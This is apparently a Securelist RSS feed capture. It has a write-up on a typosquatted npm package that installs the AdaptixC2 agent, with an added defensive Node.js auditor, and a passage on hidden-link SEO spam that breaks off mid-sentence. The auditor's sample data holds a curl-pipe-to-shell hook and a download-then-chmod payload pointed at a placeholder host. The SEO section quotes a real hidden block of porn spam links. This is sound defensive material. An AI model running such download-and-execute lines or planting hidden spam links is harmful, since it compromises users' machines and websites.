[Valid RSS] This is a valid RSS feed.

Source: https://securelist.com/feed/

<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
>

<channel>
<title>Securelist</title>
<atom:link href="https://securelist.com/feed/" rel="self" type="application/rss+xml" />
<link>https://securelist.com</link>
<description></description>
<lastBuildDate>Fri, 17 Oct 2025 10:01:45 +0000</lastBuildDate>
<language>en-US</language>
<sy:updatePeriod>
hourly </sy:updatePeriod>
<sy:updateFrequency>
1 </sy:updateFrequency>
<generator>https://wordpress.org/?v=6.8.3</generator>

<image>
<url>https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-32x32.png</url>
<title>Securelist</title>
<link>https://securelist.com</link>
<width>32</width>
<height>32</height>
</image>
<item>
<title>Post-exploitation framework now also delivered via npm</title>
<link>https://securelist.com/adaptixc2-agent-found-in-an-npm-package/117784/</link>
<comments>https://securelist.com/adaptixc2-agent-found-in-an-npm-package/117784/#respond</comments>
<dc:creator><![CDATA[Vladimir Gursky, Artem Ushkov]]></dc:creator>
<pubDate>Fri, 17 Oct 2025 10:00:33 +0000</pubDate>
<category><![CDATA[Incidents]]></category>
<category><![CDATA[Malware descriptions]]></category>
<category><![CDATA[Malware Technologies]]></category>
<category><![CDATA[Linux]]></category>
<category><![CDATA[Microsoft Windows]]></category>
<category><![CDATA[Apple MacOS]]></category>
<category><![CDATA[x64]]></category>
<category><![CDATA[Malware Descriptions]]></category>
<category><![CDATA[ARM]]></category>
<category><![CDATA[Malware]]></category>
<category><![CDATA[Supply-chain attack]]></category>
<category><![CDATA[Open source]]></category>
<category><![CDATA[Windows malware]]></category>
<category><![CDATA[Unix and macOS malware]]></category>
<category><![CDATA[Web threats]]></category>
<guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117784</guid>

<description><![CDATA[The npm registry contains a malicious package that downloads the AdaptixC2 agent onto victims' devices, Kaspersky experts have found. The threat targets Windows, Linux, and macOS.]]></description>
<content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/17081221/adaptix-featured-image-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="incident-description">Incident description</h2>
<p>The first version of the AdaptixC2 post-exploitation framework, which can be considered an alternative to the well-known Cobalt Strike, was made publicly available in early 2025. In spring 2025, the framework was <a href="https://x.com/Unit42_Intel/status/1925206262184026156" target="_blank" rel="noopener">first observed</a> being used for malicious purposes.</p>
<p>In October 2025, Kaspersky experts found a malicious package with a fairly convincing name in the npm registry: <code>https-proxy-utils</code>. It posed as a utility for using proxies within projects. At the time of writing, the package had already been taken down.</p>
<p>The package name closely resembles two popular legitimate packages: <code>http-proxy-agent</code>, with approximately 70 million weekly downloads, and <code>https-proxy-agent</code>, with approximately 90 million. Furthermore, the advertised proxy-related functionality was cloned from another popular legitimate package, <code>proxy-from-env</code>, which has 50 million weekly downloads. The threat actor, however, added a post-install script to <code>https-proxy-utils</code> that downloads and executes a payload containing the AdaptixC2 agent.</p>
<div id="attachment_117785" style="width: 1486px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1.png" class="magnificImage"><img fetchpriority="high" decoding="async" aria-describedby="caption-attachment-117785" class="size-full wp-image-117785" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1.png" alt="Metadata for the malicious (left) and legitimate (right) packages" width="1476" height="518" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1.png 1476w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1-300x105.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1-1024x359.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1-768x270.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1-997x350.png 997w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1-740x260.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1-798x280.png 798w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1-800x281.png 800w" sizes="(max-width: 1476px) 100vw, 1476px" /></a><p id="caption-attachment-117785" class="wp-caption-text">Metadata for the malicious (left) and legitimate (right) packages</p></div>
<h2 id="os-specific-adaptation">OS-specific adaptation</h2>
<p>The post-install script contains a separate payload delivery routine for each of Windows, Linux, and macOS. Each routine relies on OS-specific system or user directories to stage and launch the implant.</p>
<p>In Windows, the AdaptixC2 agent is dropped as a DLL file into the system directory <code>C:\Windows\Tasks</code>. It is then executed via <a href="https://attack.mitre.org/techniques/T1574/001/" target="_blank" rel="noopener">DLL sideloading</a>: the JS script copies the legitimate <code>msdtc.exe</code> binary into the same directory and runs it, so that the executable picks up the malicious DLL sitting next to it.</p>
<div id="attachment_117786" style="width: 688px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155221/adaptixc2-agent-found2.png" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-117786" class="size-full wp-image-117786" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155221/adaptixc2-agent-found2.png" alt="Deobfuscated Windows-specific code for loading AdaptixC2" width="678" height="569" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155221/adaptixc2-agent-found2.png 678w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155221/adaptixc2-agent-found2-300x252.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155221/adaptixc2-agent-found2-417x350.png 417w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155221/adaptixc2-agent-found2-334x280.png 334w" sizes="(max-width: 678px) 100vw, 678px" /></a><p id="caption-attachment-117786" class="wp-caption-text">Deobfuscated Windows-specific code for loading AdaptixC2</p></div>
<p>In macOS, the script downloads the payload as an executable file into the user&#8217;s autorun directory, <code>~/Library/LaunchAgents</code>. The <code>postinstall.js</code> script also drops a launchd plist into this directory so that the agent is started automatically at login. Before downloading AdaptixC2, the script checks the target architecture (x64 or ARM) and fetches the appropriate payload variant.</p>
<div id="attachment_117787" style="width: 633px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155305/adaptixc2-agent-found3.png" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-117787" class="size-full wp-image-117787" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155305/adaptixc2-agent-found3.png" alt="Deobfuscated macOS-specific code for loading AdaptixC2" width="623" height="726" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155305/adaptixc2-agent-found3.png 623w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155305/adaptixc2-agent-found3-257x300.png 257w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155305/adaptixc2-agent-found3-300x350.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155305/adaptixc2-agent-found3-240x280.png 240w" sizes="(max-width: 623px) 100vw, 623px" /></a><p id="caption-attachment-117787" class="wp-caption-text">Deobfuscated macOS-specific code for loading AdaptixC2</p></div>
<p>In Linux, the framework&#8217;s agent is downloaded into the temporary directory <code>/tmp/.fonts-unix</code>. The script delivers a binary tailored to the specific architecture (x64 or ARM) and then assigns it execute permissions.</p>
<div id="attachment_117788" style="width: 889px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117788" class="size-full wp-image-117788" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4.png" alt="Deobfuscated Linux-specific code for loading AdaptixC2" width="879" height="549" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4.png 879w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4-300x187.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4-768x480.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4-560x350.png 560w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4-740x462.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4-448x280.png 448w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4-800x500.png 800w" sizes="auto, (max-width: 879px) 100vw, 879px" /></a><p id="caption-attachment-117788" class="wp-caption-text">Deobfuscated Linux-specific code for loading AdaptixC2</p></div>
<p>Once the AdaptixC2 agent is deployed on the victim&#8217;s device, the attacker gains remote access, command execution, file and process management, and several methods of achieving persistence. This allows the attacker both to maintain consistent access and to conduct network reconnaissance and deploy subsequent stages of the attack.</p>
<h2 id="conclusion">Conclusion</h2>
<p>This is not the first attack targeting the npm registry in recent memory. A month ago, a similar infection method based on a post-install script was employed in the <a href="https://securelist.com/shai-hulud-worm-infects-500-npm-packages-in-a-supply-chain-attack/117547/" target="_blank" rel="noopener">high-profile incident</a> involving the Shai-Hulud worm, which infected more than 500 packages. The AdaptixC2 incident clearly demonstrates the growing trend of abusing open-source software ecosystems, like npm, as an attack vector. Threat actors are <a href="https://securelist.com/tag/supply-chain-attack/" target="_blank" rel="noopener">increasingly exploiting the trusted open-source supply chain</a> to distribute post-exploitation framework agents and other forms of malware. Users and organizations that develop software, or that use open-source components from ecosystems like npm in their products, are susceptible to this type of threat.</p>
<p>To stay safe, be vigilant when installing open-source modules: verify the exact name of the package you are installing, and vet unpopular and newly published packages more thoroughly. When using popular modules, it is critical to monitor <a href="https://www.kaspersky.com/open-source-feed?icid=gl_sl_post-link-open-source-feed_sm-team_cc8b77692a32ebbc" target="_blank" rel="noopener">frequently updated feeds on compromised packages and libraries</a>.</p>
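<p>The two checks recommended above (look at the package name, look at what runs at install time) can be scripted. The following Node.js auditor is an added example written for this page, not code from Kaspersky or from the npm project: it walks a list of <code>package.json</code> objects, flags install-time lifecycle hooks and grades their bodies for download and drop-path signals taken from the OS-specific section, and compares each name against a short watchlist of popular packages using both a typo distance and the "same stem, one token swapped" pattern that <code>https-proxy-utils</code> used against <code>https-proxy-agent</code>. The package list, the <code>postinstall.js</code> body and the <code>c2.invalid</code> host are constructed for the demo; in practice the objects come from <code>node_modules/&lt;name&gt;/package.json</code>.</p>

```javascript
// Added example (not from the Securelist post): audit a dependency tree for the
// two warning signs the post describes, a name one step away from a popular
// package and an install-time lifecycle hook that fetches and runs code.
// The package.json objects and script bodies below are constructed for the demo.
'use strict';

// Popular packages the malicious name imitated (named in the post). Extend as needed.
const WATCHLIST = ['http-proxy-agent', 'https-proxy-agent', 'proxy-from-env'];

// Lifecycle hooks that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Signals worth counting in an install hook. The drop paths are the ones the
// post reports for Windows, macOS and Linux; the downloader names are generic.
const SIGNALS = [
  /https?:\/\/[^\s'"]+/i,                                   // fetches from the network
  /\b(curl|wget|certutil|Invoke-WebRequest|powershell)\b/i,  // common downloaders
  /\bchmod(Sync)?\b/i,                                       // marks a dropped file executable
  /Windows\\+Tasks|LaunchAgents|\/tmp\/\.fonts-unix/i,       // drop locations from the post
  /\bnode\s+\S*postinstall\.js/i,                            // hook runs a bundled script
];

// Optimal string alignment distance: insert, delete, substitute, or swap two
// adjacent characters, each costing 1, so "agnet" is one step from "agent".
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => {
    const row = new Array(b.length + 1).fill(0);
    row[0] = i;
    return row;
  });
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// How `name` relates to a popular package: a close typo, or the same hyphenated
// stem with exactly one token swapped (https-proxy-utils vs https-proxy-agent).
function lookalike(name, popular) {
  if (name === popular) return null;
  if (editDistance(name, popular) <= 2) return 'typosquat';
  const a = name.split('-'), b = popular.split('-');
  if (a.length === b.length && a.length > 1 && a.filter((t, i) => t !== b[i]).length === 1) {
    return 'lookalike';
  }
  return null;
}

// Audit one package. `files` maps file names inside the package to their
// contents, so a hook such as "node postinstall.js" is graded on what it runs.
function auditPackage(pkg, files = {}) {
  const issues = [];
  const scripts = pkg.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (!scripts[hook]) continue;
    let body = scripts[hook];
    for (const [file, content] of Object.entries(files)) {
      if (body.includes(file)) body += '\n' + content;
    }
    issues.push({ kind: 'install-hook', hook, hits: SIGNALS.filter((re) => re.test(body)).length });
  }
  if (!WATCHLIST.includes(pkg.name)) {
    for (const popular of WATCHLIST) {
      const kind = lookalike(pkg.name, popular);
      if (kind) issues.push({ kind, of: popular });
    }
  }
  return { name: pkg.name, version: pkg.version, issues };
}

// Audit a whole tree and keep only packages with at least one finding.
function auditTree(packages, filesByName = {}) {
  return packages
    .map((pkg) => auditPackage(pkg, filesByName[pkg.name]))
    .filter((r) => r.issues.length > 0);
}

// Constructed sample tree. The postinstall body mimics the Linux branch the post
// describes (download into /tmp/.fonts-unix, then chmod); the host is a placeholder.
const SAMPLE_FILES = {
  'https-proxy-utils': {
    'postinstall.js': [
      "const https = require('https'), fs = require('fs');",
      "const url = 'https://c2.invalid/linux_update_x64'; // placeholder, not the real host",
      "https.get(url, (r) => r.pipe(fs.createWriteStream('/tmp/.fonts-unix/update')));",
      "fs.chmodSync('/tmp/.fonts-unix/update', 0o755);",
    ].join('\n'),
  },
};
const SAMPLE_PACKAGES = [
  { name: 'https-proxy-agent', version: '7.0.6', scripts: { build: 'tsc' } },
  { name: 'https-proxy-utils', version: '1.0.3', scripts: { postinstall: 'node postinstall.js' } },
  { name: 'https-proxy-agnet', version: '1.0.0', scripts: {} },
  { name: 'cool-proxy-helper', version: '0.2.1', scripts: { preinstall: 'curl -fsSL http://c2.invalid/x | sh' } },
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of auditTree(SAMPLE_PACKAGES, SAMPLE_FILES)) {
    console.log(`${f.name}@${f.version}`, JSON.stringify(f.issues));
  }
}
```

<p>Run against the sample tree, the legitimate <code>https-proxy-agent</code> produces no finding, while <code>https-proxy-utils</code> is reported both as a lookalike of <code>https-proxy-agent</code> and for a post-install hook that matches four of the five signals. The grading is deliberately crude: a hook that only compiles native code will also trip the "runs a script" signal, so treat the hit count as a triage priority rather than a verdict, and review the script body by hand. The cheapest defence is to stop install hooks from running at all with <code>npm install --ignore-scripts</code> (or <code>ignore-scripts=true</code> in <code>.npmrc</code>) and re-enable them only for packages you have reviewed.</p>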
<h2 id="indicators-of-compromise">Indicators of compromise</h2>
<p><strong>Package name</strong><br />
https-proxy-utils</p>
<p><strong>Hashes</strong><br />
<a href="https://opentip.kaspersky.com/dfbc0606e16a89d980c9b674385b448e/results?icid=gl_sl_post-link-opentip_sm-team_9a4fb45257066833&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">DFBC0606E16A89D980C9B674385B448E</a> – package hash<br />
<a href="https://opentip.kaspersky.com/b8e27a88730b124868c1390f3bc42709/results?icid=gl_sl_post-link-opentip_sm-team_c62dd3c8ffe2ed1b&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">B8E27A88730B124868C1390F3BC42709</a><br />
<a href="https://opentip.kaspersky.com/669bdbef9e92c3526302ca37dc48d21f/results?icid=gl_sl_post-link-opentip_sm-team_972755ad1f67ef7f&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">669BDBEF9E92C3526302CA37DC48D21F</a><br />
<a href="https://opentip.kaspersky.com/edac632c9b9ff2a2da0eacaab63627f4/results?icid=gl_sl_post-link-opentip_sm-team_cf39ec80bf7cdde8&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">EDAC632C9B9FF2A2DA0EACAAB63627F4</a><br />
<a href="https://opentip.kaspersky.com/764c9e6b6f38df11dc752cb071ae26f9/results?icid=gl_sl_post-link-opentip_sm-team_375c37e00fb6f5e7&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">764C9E6B6F38DF11DC752CB071AE26F9</a><br />
<a href="https://opentip.kaspersky.com/04931b7dfd123e6026b460d87d842897/results?icid=gl_sl_post-link-opentip_sm-team_76f48f8715dd6b3c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">04931B7DFD123E6026B460D87D842897</a></p>
<p><strong>Network indicators</strong><br />
<a href="https://opentip.kaspersky.com/cloudcenter.top%2fsys%2fupdate/?icid=gl_sl_post-link-opentip_sm-team_67aaee30ceb5fe92&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">cloudcenter[.]top/sys/update</a><br />
<a href="https://opentip.kaspersky.com/cloudcenter.top%2fmacos_update_arm/?icid=gl_sl_post-link-opentip_sm-team_87ea43b039efcf34&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">cloudcenter[.]top/macos_update_arm</a><br />
<a href="https://opentip.kaspersky.com/cloudcenter.top%2fmacos_update_x64/?icid=gl_sl_post-link-opentip_sm-team_0bdec936559c877d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">cloudcenter[.]top/macos_update_x64</a><br />
<a href="https://opentip.kaspersky.com/cloudcenter.top%2fmacosupdate%5b.%5dplist/?icid=gl_sl_post-link-opentip_sm-team_423c8ff0ce467cbf&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">cloudcenter[.]top/macosUpdate[.]plist</a><br />
<a href="https://opentip.kaspersky.com/cloudcenter.top%2flinux_update_x64/?icid=gl_sl_post-link-opentip_sm-team_9b4e0d2a0cdfec13&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">cloudcenter[.]top/linux_update_x64</a><br />
<a href="https://opentip.kaspersky.com/cloudcenter.top%2flinux_update_arm/?icid=gl_sl_post-link-opentip_sm-team_16b93246956b263a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">cloudcenter[.]top/linux_update_arm</a></p>
]]></content:encoded>
<wfw:commentRss>https://securelist.com/adaptixc2-agent-found-in-an-npm-package/117784/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/17081221/adaptix-featured-image.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/17081221/adaptix-featured-image-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/17081221/adaptix-featured-image-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/17081221/adaptix-featured-image-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
</item>
<item>
<title>SEO spam and hidden links: how to protect your website and your reputation</title>
<link>https://securelist.com/seo-spam-hidden-links/117782/</link>
<comments>https://securelist.com/seo-spam-hidden-links/117782/#respond</comments>
<dc:creator><![CDATA[Anna Larkina]]></dc:creator>
<pubDate>Fri, 17 Oct 2025 07:00:55 +0000</pubDate>
<category><![CDATA[Publications]]></category>
<category><![CDATA[Website Hacks]]></category>
<category><![CDATA[Content Filtering]]></category>
<category><![CDATA[XSS]]></category>
<category><![CDATA[Vulnerabilities]]></category>
<category><![CDATA[SQL injection]]></category>
<category><![CDATA[SEO]]></category>
<category><![CDATA[Black Hat SEO]]></category>
<category><![CDATA[Web threats]]></category>
<guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117782</guid>

<description><![CDATA[Are you seeing your website traffic drop, and security systems blocking it for pornographic content that is not there? Hidden links, a type of SEO spam, could be the cause.]]></description>
<content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16210132/SL-seo-spam-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>When analyzing the content of websites to determine which category they belong to, we sometimes get an utterly unexpected result. It could be the official page of a metal structures manufacturer, an online flower shop, or, say, a law firm website, with completely neutral content, yet our solutions place it squarely in the &#8220;Adult content&#8221; category. On the surface, it is completely unclear how our systems arrived at that verdict, but one look at the content categorization engine&#8217;s page analysis log clears it up.</p>
<h2 id="invisible-html-block-or-seo-spam">Invisible HTML block, or SEO spam</h2>
<p>The website falls into the questionable category because it contains an HTML block with links to third-party sites that is invisible to regular users. These sites typically host content of a certain kind, which in our experience is most often pornographic or gambling material, and the hidden block contains relevant keywords alongside the links. These practices are a type of Black Hat SEO, or SEO spam: the manipulation of website search rankings in violation of ethical search engine optimization (SEO) principles. Although attackers use many techniques to raise or lower websites in search engine rankings, we have encountered hidden blocks more frequently lately, so this is what this post focuses on.</p>
<p>Website owners rarely suspect a problem until they face obvious negative consequences, such as a sharp drop in traffic, warnings from search engines, or complaints from visitors. Those who use Kaspersky solutions may see their sites blocked because they are categorized as prohibited, a sign that something is wrong with them. Our engine detects both the links and their descriptions in a block like that.</p>
<h2 id="how-hidden-links-work">How hidden links work</h2>
<p>Hyperlinks that are invisible to regular users but can still be read by automated systems, such as search engine crawlers or our web categorization engine, are known as &#8220;hidden links&#8221;. They are often used for scams, for inflating a website&#8217;s ranking (its position in search results), or for pushing down the ranking of a victim website.</p>
<p>To understand how this works, let us first look at how today&#8217;s SEO functions. A series of algorithms is responsible for ranking websites in search results, such as those served by Google. The oldest, and the most relevant to this article, is <a href="https://en.wikipedia.org/wiki/PageRank" target="_blank" rel="noopener">PageRank</a>. The PageRank metric, or weight in the context of this algorithm, is a numerical value that expresses the importance of a specific page. The more links from other websites point to a page, and the greater those websites&#8217; own weights, the higher the page&#8217;s PageRank.</p>
<p>So, to boost their own website&#8217;s ranking in search results, the malicious actor places hidden links to it on the victim website. The higher the victim website&#8217;s PageRank, the more attractive it is to the attacker. High-traffic platforms like blogs or forums are of particular interest to them.</p>
<p>However, PageRank is no longer the only method search engines use to measure a website&#8217;s value. Google, for example, also applies other algorithms, such as the machine-learning-based <a href="https://en.wikipedia.org/wiki/RankBrain" target="_blank" rel="noopener">RankBrain</a> or the <a href="https://en.wikipedia.org/wiki/BERT_(language_model)" target="_blank" rel="noopener">BERT language model</a>. These algorithms use more sophisticated signals, such as how much authority the website has on the subject the user is asking about (the SEO industry&#8217;s <a href="https://en.wikipedia.org/wiki/Domain_authority" target="_blank" rel="noopener">Domain Authority</a> score is a third-party proxy for this), link quality, and context. Placing links on a website with a high PageRank can still be beneficial, but the effect is severely limited by advanced algorithms and filters aimed at demoting sites that break the search engine&#8217;s rules. Examples of these filters are as follows:</p>
<ul>
<li><a href="https://en.wikipedia.org/wiki/Google_Penguin" target="_blank" rel="noopener">Google Penguin</a>, which identifies and penalizes websites that use poor-quality or manipulative links, including hidden ones, to boost their own rankings. When links like these are detected, their weight can be zeroed out, and the ranking may be lowered for both sites: the victim and the spam website.</li>
<li><a href="https://en.wikipedia.org/wiki/Google_Panda" target="_blank" rel="noopener">Google Panda</a>, which evaluates content quality. If the website has a high PageRank but its content is of low quality, duplicated, auto-generated, or otherwise substandard, the site may be demoted.</li>
<li><a href="https://spambrain.com/" target="_blank" rel="noopener">Google SpamBrain</a>, which uses machine learning to analyze HTML markup, page layouts, and so forth to identify manipulative patterns. This algorithm is integrated into Google Penguin.</li>
</ul>
<h2 id="what-a-black-hat-seo-block-looks-like-in-a-pages-html-markup">What a Black Hat SEO block looks like in a page&#8217;s HTML markup</h2>
<p>Let us look at some real examples of hidden blocks we have seen on legitimate websites and determine the attributes by which such blocks can be identified.</p>
<h3 id="example-1">Example 1</h3>
<pre class="urvanov-syntax-highlighter-plain-tag">&lt;div style="display: none;"&gt;
افلام سكس اعتصاب &lt;a href="https://www.azcorts.com/" rel="dofollow" target="_self"&gt;azcorts.com&lt;/a&gt; قنوات جنسية
free indian porn com &lt;a href="https://porngun.mobi" target="_self"&gt;porngun.mobi&lt;/a&gt; xharmaster
石原莉紅 &lt;a href="https://javclips.mobi/" target="_blank" title="javclips.mobi"&gt;javclips.mobi&lt;/a&gt; ちっぱい
bank porn &lt;a href="https://pimpmpegs.net" target="_self" title="pimpmpegs.net free video porn"&gt;pimpmpegs.net&lt;/a&gt; wwwporm
salamat lyrics tagalog &lt;a href="https://www.teleseryeone.com/" target="_blank" title="teleseryeone.com sandro marcos alexa miro"&gt;teleseryeone.com&lt;/a&gt; play desi
&lt;/div&gt;
&lt;div style="display: none;"&gt;
كسى بيوجعنى &lt;a href="https://www.sexdejt.org/" rel="dofollow"&gt;sexdejt.org&lt;/a&gt; سكس سانى
indian sex video bp &lt;a href="https://directorio-porno.com/" rel="dofollow" target="_self" title="directorio-porno.com"&gt;directorio-porno.com&lt;/a&gt; xvideos indian pussy
swara bhaskar porn &lt;a href="https://greenporn.mobi" title="greenporn.mobi lesbian porn hq"&gt;greenporn.mobi&lt;/a&gt; kannada sexy video
bp sex full &lt;a href="https://tubepornmix.info" target="_blank" title="tubepornmix.info aloha tube porn video"&gt;tubepornmix.info&lt;/a&gt; lily sex
pinayflix pamasahe &lt;a href="https://www.gmateleserye.com/" rel="dofollow" target="_blank"&gt;gmateleserye.com&lt;/a&gt; family feud november 17
&lt;/div&gt;
&lt;div style="display: none;"&gt;
sunny leone ki bp download &lt;a href="https://eroebony.info" target="_self" title="eroebony.info"&gt;eroebony.info&lt;/a&gt; hansika xvideos
موقع سكس ايطالى &lt;a href="https://bibshe.com/" target="_self" title="bibshe.com سكس العادة السرية"&gt;bibshe.com&lt;/a&gt; صور احلى كس
raja rani coupon result &lt;a href="https://booketube.mobi" rel="dofollow"&gt;booketube.mobi&lt;/a&gt; exercise sex videos
indianbadwap &lt;a href="https://likeporn.mobi" rel="dofollow" target="_blank" title="likeporn.mobi free hd porn"&gt;likeporn.mobi&lt;/a&gt; rabi pirzada nude video
marathi porn vidio &lt;a href="https://rajwap.biz" rel="dofollow" target="_blank" title="rajwap.biz"&gt;rajwap.biz&lt;/a&gt; www.livesex.com
&lt;/div&gt;</pre>
  152. This example utilizes a simple CSS style,
  153. <span id="urvanov-syntax-highlighter-68f254acc263a365369805" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-o">&lt;</span><span class="crayon-e">div </span><span class="crayon-v">style</span><span class="crayon-o">=</span><span class="crayon-s">"display: none;"</span><span class="crayon-o">&gt;</span></span></span>. This is one of the most basic and widely known methods for concealing content; the parameter
  154. <span id="urvanov-syntax-highlighter-68f254acc263c130312974" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">display</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">none</span></span></span>; stands for &#8220;do not display&#8221;. We also see that each invisible
